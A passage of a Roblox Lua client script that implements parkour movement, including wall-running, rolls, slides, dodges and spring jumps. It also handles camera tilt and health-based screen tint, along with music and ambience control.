Instance.new("ColorCorrectionEffect",game.Lighting) colorparkourkill.Saturation = 0 colorparkourkill.TintColor = Color3.new(1,1,1) if game.Lighting:FindFirstChild("COLORPARKOURKILL") then game.Lighting:FindFirstChild("COLORPARKOURKILL"):Destroy() end torso = char:WaitForChild("Torso") local gyro = Instance.new("BodyGyro",torso) gyro.D = 200 gyro.P = 1800 local cameratilterman = 0 local springjumpdel =false local gobackroll = false local befpower = gyro.P gyro.P = befpower gyro.MaxTorque = Vector3.new(0,0,0) local runvel = Instance.new("BodyVelocity",root) runvel.MaxForce = Vector3.new(0,0,0) runvel.P = 9999999999999999999999 hum.WalkSpeed =20 local flowmax = 35 local flowmin = 16 local dodgedel = false local crouchspeed = 8 local flow = flowmin for i,v in pairs(game:GetService("Workspace"):GetDescendants()) do if v.ClassName == "Part" or v.ClassName == "UnionOperation" or v.ClassName == "MeshPart" then if v.ClassName == "UnionOperation" then v.CollisionFidelity = Enum.CollisionFidelity.PreciseConvexDecomposition end if v.Transparency == 1 then v.CanCollide = false end end end floorpositiony = 0 local UIS = game:GetService("UserInputService") local GuiService = game:GetService("GuiService") if UIS.TouchEnabled and not UIS.KeyboardEnabled and not UIS.MouseEnabled and not UIS.GamepadEnabled and not GuiService:IsTenFootInterface() then mobile = true jb = plr.PlayerGui:WaitForChild("TouchGui"):WaitForChild("TouchControlFrame"):WaitForChild("JumpButton") jb.MouseButton1Down:Connect(function() wallrunabletrue() wallruncheck() end) end local leftwallrunanim = Instance.new("Animation",char) leftwallrunanim.AnimationId = "rbxassetid://180426354" local leftwallrunanimplay = hum:LoadAnimation(leftwallrunanim) local downedanim1 = Instance.new("Animation",char) downedanim1.AnimationId = "rbxassetid://282574440" local downedanim1play = hum:LoadAnimation(downedanim1) local rightwallrunanim = Instance.new("Animation",char) rightwallrunanim.AnimationId = "rbxassetid://180426354" local rightwallrunanimplay = hum:LoadAnimation(rightwallrunanim) local verticalwallrunanim = Instance.new("Animation",char) verticalwallrunanim.AnimationId = "rbxassetid://180426354" local verticalwallrunanimplay = hum:LoadAnimation(verticalwallrunanim) local roll = Instance.new("Animation",char) roll.AnimationId = "rbxassetid://180612465" local rollplay = hum:LoadAnimation(roll) local crouching = Instance.new("Animation",char) crouching.AnimationId = "rbxassetid://287325678" local crouchingplay = hum:LoadAnimation(crouching) local springjump = Instance.new("Animation",char) springjump.AnimationId = "rbxassetid://287325678" local springjumpplay = hum:LoadAnimation(springjump) local dodging = Instance.new("Animation",char) dodging.AnimationId = "rbxassetid://287325678" local dodgingplay = hum:LoadAnimation(dodging) local slidinganim = Instance.new("Animation",char) slidinganim.AnimationId = "rbxassetid://132546884" local slidingplay = hum:LoadAnimation(slidinganim) local rollering = false hum.Died:Connect(function() if game.Workspace:FindFirstChild("Remote") then if game.Workspace:FindFirstChild("Remote"):FindFirstChild("TeamEvent") then Workspace.Remote.TeamEvent:FireServer("Bright orange") end end camerakill = true colorparkourkill:Destroy() for i = 20,1,-1 do wait() combatmusic.PlaybackSpeed = combatmusic.PlaybackSpeed-0.05 ambience.PlaybackSpeed = ambience.PlaybackSpeed-0.05 explorationmusic.PlaybackSpeed = explorationmusic.PlaybackSpeed-0.05 end end) local tappeda = false local tappeds = false local tappedd = false local tappedw = false UIS.InputEnded:Connect(function(input,gamestuff) if input.KeyCode == Enum.KeyCode.S then if gamestuff then return end gobackroll = false end end) UIS.InputBegan:Connect(function(input,gamestuff) if input.KeyCode == Enum.KeyCode.N then if gamestuff then return end if walkingmode == false then walkingmode = true else walkingmode = false end end if input.KeyCode == Enum.KeyCode.M then if gamestuff then return end if ambience.PlaybackSpeed ~= 0 then ambience.PlaybackSpeed = 0 combatmusic.PlaybackSpeed = 0 explorationmusic.PlaybackSpeed = 0 else ambience.PlaybackSpeed = 1 combatmusic.PlaybackSpeed = 1 explorationmusic.PlaybackSpeed = 1 end end if input.KeyCode == Enum.KeyCode.S then if gamestuff then return end gobackroll = true end if downed == true then return end if sliding == true then return end if input.KeyCode == Enum.KeyCode.A then if hitfloor == false then return end if gamestuff then return end if tappeda == false then tappeda = true wait(0.25) tappeda = false else if dodgedel == false then dodgedel = true dodgingplay:Play() randomclothrollsound() local bv = Instance.new("BodyVelocity",char:WaitForChild("Head")) bv.Velocity = root.CFrame.RightVector*-flow*2+Vector3.new(0,flow/2,0) bv.MaxForce = Vector3.new(99999,99999,99999) bv.P = 99999999999999 wait(0.1) bv:Destroy() wait(0.2) dodgingplay:Stop() dodgedel = false end end end if input.KeyCode == Enum.KeyCode.S then if hitfloor == false then return end if gamestuff then return end if tappeds == false then tappeds = true wait(0.25) tappeds = false else if dodgedel == false then dodgedel = true dodgingplay:Play() randomclothrollsound() local bv = Instance.new("BodyVelocity",char:WaitForChild("Head")) bv.Velocity = root.CFrame.LookVector*-flow*2+Vector3.new(0,flow/2,0) bv.MaxForce = Vector3.new(99999,99999,99999) bv.P = 99999999999999 wait(0.1) bv:Destroy() wait(0.2) dodgingplay:Stop() dodgedel = false end end end if input.KeyCode == Enum.KeyCode.D then if hitfloor == false then return end if gamestuff then return end if tappedd == false then tappedd = true wait(0.25) tappedd = false else if dodgedel == false then dodgedel = true dodgingplay:Play() randomclothrollsound() local bv = Instance.new("BodyVelocity",char:WaitForChild("Head")) bv.Velocity = root.CFrame.RightVector*flow*2+Vector3.new(0,flow/2,0) bv.MaxForce = Vector3.new(99999,99999,99999) bv.P = 99999999999999 wait(0.1) bv:Destroy() wait(0.2) dodgingplay:Stop() dodgedel = false end end end if input.KeyCode == Enum.KeyCode.W then if gamestuff then return end if hitfloor == false then return end if tappedw == false then tappedw = true wait(0.25) tappedw = false else if dodgedel == false then dodgedel = true dodgingplay:Play() randomclothrollsound() local bv = Instance.new("BodyVelocity",char:WaitForChild("Head")) bv.Velocity = root.CFrame.LookVector*flow*2+Vector3.new(0,flow/2,0) bv.MaxForce = Vector3.new(99999,99999,99999) bv.P = 99999999999999 wait(0.1) bv:Destroy() wait(0.2) dodgingplay:Stop() dodgedel = false end end end end) hum:SetStateEnabled(Enum.HumanoidStateType.FallingDown, false) hum:SetStateEnabled(Enum.HumanoidStateType.Ragdoll, false) --rollplay:AdjustSpeed(0) --rollplay.TimePosition = 1 local player = game.Players.LocalPlayer local character = player.Character local hum = character:FindFirstChild("Humanoid") if not character or not character.Parent then character = player.CharacterAdded:wait() if camerakill == true then return end end local torso = character:WaitForChild("Torso") local rightShoulder = torso:WaitForChild("Right Shoulder") local leftShoulder = torso:WaitForChild("Left Shoulder") local camera = game.Workspace.CurrentCamera updateSpeed = 0.5/2 local plr = game.Players.LocalPlayer local char = plr.Character local ignorelist = {plr.Character} for i,v in pairs(game:GetService("Workspace"):GetDescendants()) do if v.ClassName == "Part" or v.ClassName == "MeshPart" or v.ClassName == "UnionOperation" then if v.CanCollide == false or v.Transparency == 1 then ignorelist[#ignorelist+1] = v end end end leftarm = char:WaitForChild("Left Arm") rightarm = char:WaitForChild("Right Arm") leftleg = char:WaitForChild("Left Leg") if char:FindFirstChild("Head"):FindFirstChild("BillboardGui") then char:FindFirstChild("Head"):FindFirstChild("BillboardGui"):Destroy() end local flowermax = flowmax-flowmin local killermancamfov = 0 rightleg = char:WaitForChild("Right Leg") local hum = char:WaitForChild("Humanoid") local rootpart,head = char:WaitForChild("HumanoidRootPart"),char:WaitForChild("Head") game:GetService("RunService"):BindToRenderStep("CameraOffset",Enum.RenderPriority.Character.Value+1,function() local offsetman = 1.5 if sliding == true then offsetman = 0 end if hum.Health == 0 then script:Destroy() end local distance = (character.Head.Position - camera.CoordinateFrame.p).magnitude if distance <= 1 then rightShoulder.C0 = rightShoulder.C0:lerp((camera.CoordinateFrame * CFrame.new(1, -1, 0)):toObjectSpace(torso.CFrame):inverse() * CFrame.Angles(0, math.pi/2, 0), updateSpeed) leftShoulder.C0 = leftShoulder.C0:lerp((camera.CoordinateFrame * CFrame.new(-1, -1, 0)):toObjectSpace(torso.CFrame):inverse() * CFrame.Angles(0, -math.pi/2, 0), updateSpeed) else rightShoulder.C0 = rightShoulder.C0:lerp(CFrame.new(1, 0.5, 0) * CFrame.Angles(0, math.pi/2, 0),updateSpeed) leftShoulder.C0 = leftShoulder.C0:lerp(CFrame.new(-1, 0.5, 0) * CFrame.Angles(0, -math.pi/2, 0),updateSpeed) end hum.CameraOffset = (rootpart.CFrame+Vector3.new(0,offsetman,0)):pointToObjectSpace(head.CFrame.p) rightarm.LocalTransparencyModifier = rightarm.Transparency+0.5 leftarm.LocalTransparencyModifier = leftarm.Transparency+0.5 leftleg.LocalTransparencyModifier = leftleg.Transparency+0.5 rightleg.LocalTransparencyModifier = rightleg.Transparency+0.5 if camerakill == false then game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, true) killermancamfov = 20*(flow/flowermax) colorparkourkill.TintColor = Color3.new(1,colormansup/255,colormansup/255) colormansup = colormansup+5 if colormansup> 255 then colormansup = 255 end cam.FieldOfView = 50+killermancamfov cam.CFrame = cam.CFrame*CFrame.Angles(0,0,math.rad(cameratilterman)) end end) local befh = hum.Health local function round(number, decimalPlaces) number = math.round(number * 10^decimalPlaces) * 10^-decimalPlaces end local humdowner = false function downer() flow = flow-flowmax/10 downedanim1play:Play() colormansup = colormansup-60 downedsound:play() randomclothrollsound(true) randomclothrollsound(true) randomclothrollsound() randomclothrollsound() randomclothrollsound() downed = true hum.JumpPower =0 downeddel = true coroutine.resume(coroutine.create(function() local tiltnumb = 0 local rannum = math.random(1,4) if rannum == 1 then tiltnumb = 80 elseif rannum == 2 then tiltnumb = 50 elseif rannum == 3 then tiltnumb = -80 else tiltnumb = -50 end local cameratilterman2 =tiltnumb*0.2 local cameratiltermax = cameratilterman2 local sinnerman = 1 local sinnerman2 = 0 for i = 20,1,-1 do game:GetService("RunService").RenderStepped:Wait() if camerakill == true then return end sinnerman = sinnerman-0.05 sinnerman2 = math.sin(sinnerman*1.25) print(sinnerman .. " I AM SIN") cameratilterman2 = cameratiltermax*sinnerman2 cam.CFrame = cam.CFrame*CFrame.Angles(0,0,math.rad(cameratilterman2)) end wait(1) downeddel = false end)) end hum.HealthChanged:Connect(function() colorparkourkill.Saturation = -1+hum.Health/hum.MaxHealth if hum.Health/hum.MaxHealth < 0.25 then if humdowner == false then humdowner = true downer() end end if hum.Health < befh then combattime = 18 local damagetiltmax = befh - hum.Health round(damagetiltmax,1) colormansup = colormansup-damagetiltmax*4.25 local cameratilterman2 = math.random(damagetiltmax*-20,damagetiltmax*20) cameratilterman2 = cameratilterman2 *0.05 local cameratilterman3 = math.random(damagetiltmax*-20,damagetiltmax*20) cameratilterman3 = cameratilterman3 *0.0008675 local cameratiltermax = cameratilterman2 local cameratiltermax2 = cameratilterman3 local sinnerman = 1 local sinnerman2 = 0 for i = 10,1,-1 do game:GetService("RunService").RenderStepped:Wait() sinnerman = sinnerman-0.1 sinnerman2 = math.sin(sinnerman*1.25) print(sinnerman .. " I AM SIN") cameratilterman2 = cameratiltermax*sinnerman2 cameratilterman3 = cameratiltermax2*sinnerman2 cam.CFrame = cam.CFrame*CFrame.Angles(math.rad(cameratilterman3),0,math.rad(cameratilterman2)) end end befh = hum.Health end) function tilterepic(maxnumbman,slideringman) coroutine.resume(coroutine.create(function() if maxnumbman ~= 0 then local sinnerman = 0 local slidingtruth = false if slideringman ~= nil then if slideringman == true then slidingtruth = true end end for i = 20,1,-1 do if slidingtruth == false then if wallrunning == false then return end end if slidingtruth == true then if sliding == false then return end end game:GetService("RunService").RenderStepped:Wait() if camerakill == true then return end sinnerman = sinnerman+0.05 sinnerman = math.sin(sinnerman*1.25) print(sinnerman .. " I AM SIN2") cameratilterman = maxnumbman*sinnerman end else print("I AM ZERO BOYO") local cameratiltermax = cameratilterman local sinnerman = 1 local sinnerman2 = 0 for i = 10,1,-1 do game:GetService("RunService").RenderStepped:Wait() if camerakill == true then return end sinnerman = sinnerman-0.1 sinnerman2 = math.sin(sinnerman*1.25) print(sinnerman .. " I AM SIN") cameratilterman = cameratiltermax*sinnerman2 end wait() cameratilterman = 0 end end)) end local rolldel =false function roll() if sliding == true then return end if hitfloor == false then return end if wallrunning == true then return end if rolldel == true then return end rolldel = true randomclothrollsound(true) rollingsound.TimePosition = 0.3 rollingsound:Play() root.Velocity = Vector3.new(0,0,0) local x, y, z = root.CFrame:ToEulerAnglesYXZ() rollering = true tricksinarow = tricksinarow+1 local rollmancf = CFrame.new(Vector3.new(root.Position.X,floorpositiony+1.5,root.Position.Z))*CFrame.Angles(0, y, 0) root.CFrame = rollmancf wait() root.Velocity = Vector3.new(0,0,0) flow = flow+(flowmax-flowmin)/8 runvel.Velocity = (root.CFrame.LookVector*hum.WalkSpeed) local bp = Instance.new("BodyPosition",torso) bp.Position = Vector3.new(0,floorpositiony,0) bp.MaxForce = Vector3.new(0,999999999,0) bp.P = 25000 hum.PlatformStand = true runvel.MaxForce = Vector3.new(99999,99999,99999) gyro.CFrame = rollmancf gyro.P = 99999 gyro.MaxTorque = Vector3.new(99999,99999,99999) rollplay:Play() local lookcfog = cam.CFrame local angle = 0 rollplay:AdjustSpeed(0) rollplay.TimePosition = 1 local rotatenumb = -18 if gobackroll == true then rotatenumb = 18 end for i = 20,1,-1 do rs.Heartbeat:Wait() if camerakill == true then return end runvel.MaxForce = Vector3.new(99999,99999,99999) runvel.Velocity = rollmancf.LookVector*-rotatenumb*3 gyro.CFrame = gyro.CFrame*CFrame.Angles(math.rad(rotatenumb),0,0) root.CFrame = gyro.CFrame end runvel.MaxForce = Vector3.new(0,0,0) rollplay:Stop() hum.PlatformStand = false rollering = false bp:Destroy() gyro.P = befpower runvel.MaxForce = Vector3.new(0,0,0) gyro.MaxTorque = Vector3.new(0,0,0) root.Velocity = Vector3.new(0,0,0) root.Velocity = Vector3.new(0,0,0) rolldel = false if rotatenumb == 18 then cam.CFrame = lookcfog end wait() end local cdown = false UIS.InputBegan:Connect(function(input,g) if input.KeyCode == Enum.KeyCode.C then if g then return end cdown = true end if input.KeyCode == Enum.KeyCode.P then if g then return end hum:TakeDamage(1) end end) UIS.InputEnded:Connect(function(input,g) if input.KeyCode == Enum.KeyCode.C then if g then return end cdown = false end end) wallrunable = false wallrunning = false hitfloor = false leftwallrunning = false rightwallrunning = false onfloor = false frontwallrunning = false fronthit = false rs = game:GetService("RunService") cam = game:GetService("Workspace").CurrentCamera UIS.InputBegan:Connect(function(input,gamestuff) if input.KeyCode == Enum.KeyCode.X then if camerakill == true then return end if gamestuff then return end if camerakill == false then for i = 5,1,-1 do rs.RenderStepped:Wait() if camerakill == true then return end cam.CFrame = cam.CFrame*CFrame.Angles(0,math.rad(35),0) end end end end) local rollering = false coroutine.resume(coroutine.create(function() while true do if camerakill == true then return end rs.RenderStepped:Wait() if combattime > 0.05 then if combatmusic.Volume ~= 0.5 then combatmusic.Volume = 0.5 ambience.Volume = 0 explorationmusic.Volume = 0 combatmusic:Play() end combattime = combattime-0.01 else combattime = 0 if combatmusic.Volume == 0.5 then combatmusic.Volume = 0 ambience.Volume = 0.5 explorationmusic.Volume = 0 end end if rolldel == true or downed == true then if camerakill == true then return end cam.CFrame = char:WaitForChild("Head").CFrame end if camerakill == false then winder.Volume = root.Velocity.Magnitude*0.015 if winder.Volume > 5 then winder.Volume = 5 end winder.PlaybackSpeed = root.Velocity.Magnitude*0.015 if winder.PlaybackSpeed > 4 then winder.PlaybackSpeed = 4 end windercloth.Volume = root.Velocity.Magnitude*0.015 if windercloth.Volume > 5 then windercloth.Volume = 5 end windercloth.PlaybackSpeed = root.Velocity.Magnitude*0.015 if windercloth.PlaybackSpeed > 2 then windercloth.PlaybackSpeed = 2 end end if rolldel == false and wallrunning == false and sliding == false and downed == false and holding == false then hum.AutoRotate = true if slidingsound.IsPlaying == true then slidingsound:Stop() end if wallrunningsound.IsPlaying == true then wallrunningsound:Stop() end else hum.AutoRotate = false if wallrunning == true then if wallrunningsound.IsPlaying == false then wallrunningsound:Play() end else if wallrunningsound.IsPlaying == true then wallrunningsound:Stop() end end if sliding == true then if slidingsound.IsPlaying == false then slidingsound:Play() end else if slidingsound.IsPlaying == true then slidingsound:Stop() end end end end end)) function wallrunabletrue() coroutine.resume(coroutine.create(function() if hitfloor == true then return end wallrunable = true wait(0.05) wallrunable = false end)) end wallrundel = false function verticalwallrun(grav2) coroutine.resume(coroutine.create(function() if wallrundel == true then return end if wallrunning == true then return end if downed == true then return end if cdown == true then return end if wallrunable == false then return end if fronthit then print("Made it 1") local rr = Ray.new(root.Position,root.CFrame.LookVector*5) local rhit,ray,rpoint = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(rr,ignorelist) if rhit then if rhit then wallrunning = false wait() tilterepic(0) tricksinarow = tricksinarow+1 wallrunning = true gyro.CFrame = CFrame.new(root.Position,root.Position+rpoint)*CFrame.Angles(math.rad(-22),math.rad(180),0) gyro.MaxTorque = Vector3.new(99999,99999,99999) local grav = grav2-11 runvel.Velocity = Vector3.new(0,grav,0) print("Made it 2") runvel.MaxForce = Vector3.new(99999,99999,99999) wallrunable = false hum.PlatformStand = true randomclothrollsound() verticalwallrunanimplay:Play() while wallrunning == true do rs.RenderStepped:Wait() if camerakill == true then return end grav = grav-0.8 local r2 = Ray.new(root.Position,root.CFrame.LookVector*5) local hit,ray,point = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(r2,ignorelist) if hit then print("Made it 3") if hitfloor then wallrunning = false end if cdown == true then wallrunning = false end if hit then gyro.CFrame = CFrame.new((ray+root.CFrame.LookVector*-2),(ray+root.CFrame.LookVector*-2)+point)*CFrame.Angles(math.rad(-22),math.rad(180),0) runvel.Velocity = Vector3.new(0,grav,0) gyro.P = befpower if wallrunable == true then wallrunning = false gyro.MaxTorque = Vector3.new(0,0,0) hum.PlatformStand = false print("Jump") randomclothrollsound() jumplandsoundthingy:Play() local rannum = math.random(1,3) if rannum == 1 then jumplandsoundthingy.SoundId = "rbxassetid://6079433272" elseif rannum == 2 then jumplandsoundthingy.SoundId = "rbxassetid://6079432684" else jumplandsoundthingy.SoundId = "rbxassetid://6079431954" end bodymovesound:Play() hum.PlatformStand = false runvel.velocity = root.CFrame.LookVector*-hum.WalkSpeed+Vector3.new(0,30,0) wait(0.22) end else wallrunning = false end else wallrunning = false end end hum.PlatformStand = false verticalwallrunanimplay:Stop() gyro.MaxTorque = Vector3.new(0,0,0) print("Wall run ended") runvel.MaxForce = Vector3.new(0,0,0) hum:ChangeState(Enum.HumanoidStateType.Jumping) return end end end end)) end function wallruncheck() if downed == true then if rolldel == false and downeddel == false then downedanim1play:Stop() downed = false hum.JumpPower = 50 roll() return end end if sliding == true then return end if cdown == true then if hitfloor == true then roll() end end if wallrundel == true then return end if wallrunning == true then return end if wallrunable == false then return end if cdown == true then return end if dodgedel == true then return end wallrunable = false local rr = Ray.new(root.Position,root.CFrame.RightVector*3.5) local rhit,ray,rpoint = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(rr,ignorelist) if rhit then if rhit then wallrunning = true gyro.CFrame = CFrame.new(root.Position,root.Position+rpoint)*CFrame.Angles(0,math.rad(-90),math.rad(20)) gyro.MaxTorque = Vector3.new(99999,99999,99999) hum.PlatformStand = true local grav = 20 runvel.Velocity = gyro.CFrame.LookVector*30+Vector3.new(0,grav,0) runvel.Velocity = runvel.Velocity + gyro.CFrame.RightVector*5 runvel.MaxForce = Vector3.new(99999,99999,99999) rightwallrunanimplay:Play() randomclothrollsound() tricksinarow = tricksinarow+1 tilterepic(35) while wallrunning == true do if camerakill == true then return end rs.RenderStepped:Wait() grav = grav-0.95 local r2 = Ray.new(root.Position,root.CFrame.RightVector*5) local hit,ray,point = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(r2,ignorelist) if hit then if hitfloor then wallrunning = false end if cdown == true then wallrunning = false end if fronthit == true then print("Face died") tilterepic(0) wallrunning = false rightwallrunanimplay:Stop() gyro.MaxTorque = Vector3.new(0,0,0) print("Wall run end") runvel.MaxForce = Vector3.new(0,0,0)wallrunable = true verticalwallrun(grav+hum.WalkSpeed) return end if hit then gyro.CFrame = CFrame.new((ray+root.CFrame.RightVector*-2),(ray+root.CFrame.RightVector*-2)+point)*CFrame.Angles(0,math.rad(-90),math.rad(20)) runvel.Velocity = gyro.CFrame.LookVector*hum.WalkSpeed+Vector3.new(0,grav,0) gyro.P = befpower if wallrunable == true then tilterepic(0) wallrunning = false rightwallrunanimplay:Stop() gyro.MaxTorque = Vector3.new(0,0,0) hum.PlatformStand = false jumplandsoundthingy:Play() randomclothrollsound() local rannum = math.random(1,3) if rannum == 1 then jumplandsoundthingy.SoundId = "rbxassetid://6079433272" elseif rannum == 2 then jumplandsoundthingy.SoundId = "rbxassetid://6079432684" else jumplandsoundthingy.SoundId = "rbxassetid://6079431954" end bodymovesound:Play() runvel.velocity = cam.CFrame.LookVector*hum.WalkSpeed+Vector3.new(0,30,0) wait(0.22) end else wallrunning = false end else wallrunning = false end end tilterepic(0) hum.PlatformStand = false rightwallrunanimplay:Stop() gyro.MaxTorque = Vector3.new(0,0,0) print("Wall run end") runvel.MaxForce = Vector3.new(0,0,0) return end end local rl = Ray.new(root.Position,root.CFrame.RightVector*-3.5) local lhit,ray,rpoint = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(rl,ignorelist) if lhit then if lhit then wallrunning = true gyro.CFrame = CFrame.new(root.Position,root.Position+rpoint)*CFrame.Angles(0,math.rad(90),math.rad(-20)) gyro.MaxTorque = Vector3.new(99999,99999,99999) gyro.P = 250 local grav = 20 runvel.Velocity = (gyro.CFrame.LookVector*30+Vector3.new(0,grav,0)) runvel.Velocity = runvel.Velocity + gyro.CFrame.RightVector*-5 hum.PlatformStand = true leftwallrunanimplay:Play() randomclothrollsound() tilterepic(-35) tricksinarow = tricksinarow+1 runvel.MaxForce = Vector3.new(99999,99999,99999) while wallrunning == true do if camerakill == true then return end rs.RenderStepped:Wait() if hitfloor then wallrunning = false end if fronthit == true then print("Face died") tilterepic(0) wallrunning = false leftwallrunanimplay:Stop() gyro.MaxTorque = Vector3.new(0,0,0) print("Wall run end") runvel.MaxForce = Vector3.new(0,0,0) wallrunable= true verticalwallrun(grav+hum.WalkSpeed) return end rs.RenderStepped:Wait() if camerakill == true then return end grav = grav-0.95 local r2 = Ray.new(root.Position,root.CFrame.RightVector*-5) local hit,ray,point = game:GetService("Workspace"):FindPartOnRayWithIgnoreList(r2,ignorelist) if hit then if cdown == true then wallrunning = false end if hit then gyro.CFrame = CFrame.new((ray+root.CFrame.RightVector*2),(ray+root.CFrame.RightVector*2)+point)*CFrame.Angles(0,math.rad(90),math.rad(-20)) runvel.Velocity = gyro.CFrame.LookVector*hum.WalkSpeed+Vector3.new(0,grav,0) gyro.P = befpower if wallrunable == true then wallrunning = false tilterepic(0) leftwallrunanimplay:Stop() gyro.MaxTorque = Vector3.new(0,0,0) hum.PlatformStand = false jumplandsoundthingy:Play() randomclothrollsound() local rannum = math.random(1,3) if rannum == 1 then jumplandsoundthingy.SoundId = "rbxassetid://6079433272" elseif rannum == 2 then jumplandsoundthingy.SoundId = "rbxassetid://6079432684" else jumplandsoundthingy.SoundId = "rbxassetid://6079431954" end bodymovesound:Play() runvel.velocity = cam.CFrame.LookVector*hum.WalkSpeed+Vector3.new(0,30,0) wait(0.22) end else wallrunning = false end else wallrunning = false end end hum.PlatformStand = false leftwallrunanimplay:Stop() tilterepic(0) gyro.MaxTorque = Vector3.new(0,0,0) print("Wall run end") runvel.MaxForce = Vector3.new(0,0,0) return end end wallrunable = true verticalwallrun(hum.WalkSpeed+20) end local spacedown = false local backjumpdel = false local backhit = false UIS.InputBegan:Connect(function(inpt,gamestuff) if inpt.KeyCode == Enum.KeyCode.Space then if gamestuff then return end if wallrunning == false then if sliding == false then if backhit == true then if hitfloor == false then jumplandsoundthingy:Play() randomclothrollsound(false) root.Velocity = root.CFrame.LookVector*120+Vector3.new(0,40,0) end end end end wallrunabletrue() wallruncheck() if sliding == true then spacedown = true wait(0.1) spacedown = false end wait(0.1) if wallrunning == false then if rolldel == false then if backjumpdel == false then end end end end end) function slide() coroutine.resume(coroutine.create(function() if downed == true then return end if sliding == true then return end sliding = true randomclothrollsound() tilterepic(-15,true) hum.PlatformStand = true gyro.MaxTorque = Vector3.new(99999,99999,99999) gyro.P = befpower*3 runvel.MaxForce = Vector3.new(99999,99999,99999) local ogcf = root.CFrame local befrooty = root.Position.Y local ogcf = root.CFrame gyro.CFrame = ogcf*CFrame.Angles(math.rad(80),0,0) print("BEGINSLIDE") tricksinarow = tricksinarow+1 while sliding == true do rs.RenderStepped:Wait() if camerakill == true then return end runvel.Velocity = (ogcf.LookVector*flow*1.45)+Vector3.new(0,-70,0) slidingplay:Play() slidingplay:AdjustSpeed(0) if root.Position.Y+0.05 < befrooty then flow = flow+flowmax/70 end befrooty = root.Position.Y if root.Velocity.Magnitude < 20 then sliding = false slidingplay:Stop() tilterepic(0,true) cdown = false break end if cdown == false then sliding = false slidingplay:Stop() tilterepic(0,true) break else end flow = flow-flowmax/100 if spacedown == true then sliding = false cdown = false slidingplay:Stop() tilterepic(0,true) break end if flow < flowmin+5 then sliding = false flow = flowmin slidingplay:Stop() tilterepic(0,true) break end end gyro.MaxTorque = Vector3.new(0,0,0) gyro.P = befpower runvel.MaxForce = Vector3.new(0,0,0) hum.PlatformStand = false if spacedown == true and flow < flowmax then hum.PlatformStand = true sliding = false tilterepic(0,true) slidingplay:Stop() local x, y, z = cam.CFrame:ToEulerAnglesYXZ() rollering = true root.CFrame = CFrame.new(root.Position)*CFrame.Angles(0, y, 0) bodymovesound:Play() roll() return elseif spacedown == true and flowmax+3 < flow then hum.PlatformStand = false sliding = false tilterepic(0,true) slidingplay:Stop() runvel.MaxForce = Vector3.new(99999,99999,99999) bodymovesound:Play() jumplandsoundthingy:Play() randomclothrollsound() local rannum = math.random(1,3) if rannum == 1 then jumplandsoundthingy.SoundId = "rbxassetid://6079433272" elseif rannum == 2 then jumplandsoundthingy.SoundId = "rbxassetid://6079432684" else jumplandsoundthingy.SoundId = "rbxassetid://6079431954" end runvel.velocity = cam.CFrame.LookVector*flow*2+Vector3.new(0,flow,0) coroutine.resume(coroutine.create(function() local tiltnumb = 0 local rannum = math.random(1,4) if rannum == 1 then tiltnumb = 40 elseif rannum == 2 then tiltnumb = 20 elseif rannum == 3 then tiltnumb = -40 else tiltnumb = -20 end local cameratilterman2 =tiltnumb*0.2 local cameratiltermax = cameratilterman2 local sinnerman = 1 local sinnerman2 = 0 for i = 10,1,-1 do game:GetService("RunService").RenderStepped:Wait() if camerakill == true then return end sinnerman = sinnerman-0.1 sinnerman2 = math.sin(sinnerman*1.25) print(sinnerman .. " I AM SIN") cameratilterman2 = cameratiltermax*sinnerman2 cam.CFrame = cam.CFrame*CFrame.Angles(0,0,math.rad(cameratilterman2)) end end)) wait(0.25) runvel.MaxForce = Vector3.new(0,0,0) return else hum.PlatformStand = false sliding = false return end end)) end local sliding = false local rppos = Vector3.new(0,0,0) local landed = false local pressspacebeforeland = false local landdel = false local beforelandy = 0 function landdeler() coroutine.resume(coroutine.create(function() landdel = true wait(0.2) landdel = false pressspacebeforeland = false beforelandy = root.Position.Y end)) end UIS.InputBegan:Connect(function(input,gamestuff) if springjumpdel == true then return end if input.KeyCode == Enum.KeyCode.Space then if gamestuff == true then return end if hitfloor == true then if pressspacebeforeland == false then pressspacebeforeland = true else if root.Position.Y > beforelandy+2 then runvel.MaxForce = Vector3.new(99999,99999,99999) runvel.Velocity = cam.CFrame.LookVector*flow*2+Vector3.new(0,flow/2,0) springjumpdel = true randomclothrollsound() jumplandsoundthingy:Play() local rannum = math.random(1,3) if rannum == 1 then jumplandsoundthingy.SoundId = "rbxassetid://6079433272" elseif rannum == 2 then jumplandsoundthingy.SoundId = "rbxassetid://6079432684" else jumplandsoundthingy.SoundId = "rbxassetid://6079431954" end bodymovesound:Play() pressspacebeforeland = false springjumpplay:Play() tricksinarow = tricksinarow+1 coroutine.resume(coroutine.create(function() local tiltnumb = 0 local rannum = math.random(1,4) if rannum == 1 then tiltnumb = 40 elseif rannum == 2 then tiltnumb = 20 elseif rannum == 3 then tiltnumb = -40 else tiltnumb = -20 end local cameratilterman2 =tiltnumb*0.2 local cameratiltermax = cameratilterman2 local sinnerman = 1 local sinnerman2 = 0 for i = 10,1,-1 do game:GetService("RunService").RenderStepped:Wait() if camerakill == true then return end sinnerman = sinnerman-0.1 sinnerman2 = math.sin(sinnerman*1.25) print(sinnerman .. " I AM SIN") cameratilterman2 = cameratiltermax*sinnerman2 cam.CFrame = cam.CFrame*CFrame.Angles(0,0,math.rad(cameratilterman2)) end end)) wait(0.2) springjumpplay:Stop() runvel.MaxForce = Vector3.new(0,0,0) wait(0.2) springjumpdel = false end end end end end) local plr = game.Players.LocalPlayer local Character = plr.Character or plr.CharacterAdded:Wait() local Root = Character:WaitForChild("HumanoidRootPart") local Head = Character:WaitForChild("Head") local Hum = Character:WaitForChild("Humanoid") local holdingon = Instance.new("Animation",hum) holdingon.AnimationId = "rbxassetid://148831003" local climbingstuffs = Instance.new("Animation",hum) climbingstuffs.AnimationId = "rbxassetid://125750702" local CA = Hum:LoadAnimation(climbingstuffs) local HA = Hum:LoadAnimation(holdingon) local TouchGui = plr:WaitForChild("PlayerGui"):FindFirstChild("TouchGui") local UIS = game:GetService("UserInputService") ledgeavailable = true holding = false function climb() local Vele = Instance.new("BodyVelocity",Head) Root.Anchored = false Vele.MaxForce = Vector3.new(1,1,1) * math.huge Vele.Velocity = Root.CFrame.LookVector * 10 + Vector3.new(0,30,0) HA:Stop() CA:Play() game.Debris:AddItem(Vele,.15) holding = false wait(.0) ledgeavailable = true end UIS.InputBegan:Connect(function(Key,Chat) if not holding then return 